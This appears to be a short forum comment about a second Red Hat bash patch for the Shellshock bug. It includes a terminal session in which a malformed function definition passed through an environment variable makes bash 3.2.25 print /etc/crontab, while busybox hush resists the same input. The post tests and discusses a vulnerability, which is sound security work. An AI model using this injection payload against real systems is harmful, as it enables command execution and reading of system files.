http://mirror.centos.org/centos/6/updates/x86_64/Packages/ba...
What I find slightly strange is that a second patch is not yet available on gnu/bash itself, so this must have been developed in-house by Red Hat or published elsewhere first.
I guess we could diff the second version with the first.
$ bash --version
GNU bash, version 3.2.25(1)-release (i686-redhat-linux-gnu)
Copyright (C) 2005 Free Software Foundation, Inc.
$ env -i X='() { (a)=<\' bash -c '/etc/crontab cat'
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
busybox$ env -i X='() { (a)=<\' ./busybox hush -c '/etc/crontab cat'
hush: can't execute '/etc/crontab': Permission denied